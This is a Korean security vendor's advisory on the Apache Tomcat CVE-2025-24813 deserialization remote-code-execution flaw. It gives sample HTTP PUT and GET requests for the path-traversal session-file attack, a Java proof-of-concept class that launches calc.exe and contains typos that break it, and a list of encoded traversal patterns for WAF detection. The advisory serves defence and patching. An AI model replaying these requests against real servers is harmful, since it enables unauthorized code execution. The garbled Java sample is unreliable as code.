[2025년 4월 취약점 보고서] Apache Tomcat RCE Vulnerability (CVE-2025-24813)

Apache Tomcat은 전 세계적으로 널리 사용되는 Java 기반 웹 애플리케이션 서버로, 최근 CVE-2025-24813으로 확인된 심각한 경로 동등성 취약점이 발견되었습니다. 이 취약점은 디폴트서블릿의 경로 유효성 검사 오류로 인해 공격자가 인증 없이 제한된 리소스에 액세스하거나 임의의 코드를 실행할 수 있는 위험성을 내포하고 있습니다.

공격자는 특수하게 조작된 경로가 포함된 HTTP 요청을 통해 인증을 우회하고 일반적으로 인증된 사용자만 사용할 수 있는 작업을 실행할 수 있습니다. 특히, 시스템 권한을 완전히 탈취하거나 악성 파일을 실행하는 원격코드실행(RCE) 시도로 이어질 수 있으므로 Apache Tomcat을 사용하는 기업 및 기관은 최신 보안 패치를 시급히 적용해야 합니다.

안랩의 AIWAF 제품은 Apache Tomcat과 같이 널리 사용되는 오픈소스 기반 웹 서버에서 발생할 수 있는 취약점을 실시간으로 지속적으로 모니터링하고 탐지 시그니처와 우회 패턴 분석을 기반으로 선제적 방어가 가능하도록 대응하고 있습니다. 향후에도 유사한 경로 우회 및 인증 우회 취약점을 지속적으로 분석하여 업데이트할 예정입니다.

1. 개요

Apache Tomcat은 Apache License Version 2를 따르는 오픈소스 소프트웨어로, Java Server Page(JSP)와 Java Servlet을 실행하기 위한 서블릿 컨테이너(Servlet Container) 를 제공합니다. 이 소프트웨어는 상용 웹 애플리케이션 서버에서도 서블릿 컨테이너로 널리 사용되고 있으며, 해당 소프트웨어에서 발생한 RCE 취약점에 대해 분석한 내용을 정리하였습니다.

출처 : https://tomcat.apache.org/

2. 공격 유형

CVE-2025-24813은 Tomcat이 부분적인 PUT 요청을 처리하는 방식에서 비롯되었으며, 원격의 인증되지 않은 공격자가 원격 코드 실행(RCE)을 수행하고 보안에 민감한 파일을 보고 해당 파일에 콘텐츠를 삽입할 수 있도록 허용합니다.

• 공격자는 Base64로 인코딩된 직렬화된 Java 페이로드가 포함된 PUT 요청을 서버로 전송합니다. 이 페이로드는 역직렬화 시 RCE를 트리거하도록 설계되었습니다.
  • ex)

    PUT /uploads/check.txt HTTP/1.1
    Host: vulnerabel-server.com
    Content-Length: 10
    
    testdata
    

• Java 기반 페이로드 생성
  • ex)

    import java.io.IOException;
    
    public calss Exploit{
      static{
        trt{
          Runtime.getRuntime().exec("cmd.exe /c calc.exe");
        } catch (IOException e){
          e.printStackTrace();
        }
      }
    }
    

• Exploit upload 패킷 생성
  • ex)

    PUT /uploads/../sessions/attacker.session HTTP/1.1
    Host: vulnerable-server.com
    Content-Type: application/octet-stream
    Content-Length: 1024
    
    <serialized payload data>
    

  • Apache Tomcat은 디렉토리 탐색으로 인해 이 파일을 합법적인 세션 객체로 잘못 취급
• 위의 요청을 보낸 다음 공격자는 악성 세션을 참조하는 특수하게 조작된 "JSESSIONID" 쿠키가 포함된 GET 요청을 보내 서버가 페이로드를 역직렬화하고 임의 코드를 실행하게 합니다.
  • ex)

    GET /index.jsp HTTP/1.1
    Host: vulnerable-server.com
    Cookie: JSESSIONID=attacker
    

3. 대응

CVE-2025-24813은 Tomcat 9.0.99 이상, 10.1.35 이상, 11.0.3 이상의 버전에서 보안 패치를 통해 대응 되었으므로 해당 보안 패치 이상의 버전을 사용하는 것을 권고드립니다.

해당 취약점의 경우 저희 WAF에서는 /..;/, %2e%2e%3b/, ;%2e%2e/ 등 인코딩된 우회 경로를 통한 공격을 대응하는 방안으로 추가 분석하여 업데이트 할 예정입니다.

4. 결론

Apache Tomcat은 전 세계적으로 널리 사용되는 Java 기반의 웹 애플리케이션 서버로, 최근 CVE-2025-24813로 식별되는 RCE 취약점이 발견되었습니다. 이 취약점은 DefaultServlet의 경로 검증 오류로 인해, 공격자가 인증 없이 제한된 리소스에 접근하거나 임의의 코드 실행이 가능한 위험을 내포하고 있습니다.

공격자는 특수하게 조작된 경로를 포함한 HTTP 요청을 통해 인증을 우회 하고, 보통은 인증된 사용자만 수행할 수 있는 작업을 실행할 수 있습니다. 특히 시스템에 대한 완전한 권한을 탈취하거나 악성 파일을 실행시키는 원격 코드 실행(RCE) 시도로 이어질 수 있으므로, Apache Tomcat을 사용하는 기업 및 기관에서는 최신 보안 패치 적용이 시급히 요구됩니다.

저희 AIWAF 제품은 Apache Tomcat과 같이 광범위하게 사용되는 오픈소스 기반 웹 서버에서 발생할 수 있는 취약점들을 지속적으로 모니터링하고 실시간 탐지하고 있으며, 해당 취약점에 대해서도 탐지 시그니처 및 우회 패턴 분석을 바탕으로 선제적 방어가 가능하도록 대응하고 있습니다. 앞으로도 유사한 경로 우회 및 인증 우회 취약점에 대해서는 지속적으로 분석 및 업데이트를 진행할 예정입니다.

5. 참조

• https://www.cyfirma.com/research/cve-2025-24813-apache-tomcat-rce-vulnerability-analysis/
• https://www.rapid7.com/blog/post/2025/03/19/etr-apache-tomcat-cve-2025-24813-what-you-need-to-know/
• https://www.recordedfuture.com/blog/apache-tomcat-cve-2025-24813-vulnerability-analysis
• https://nvd.nist.gov/vuln/detail/CVE-2025-24813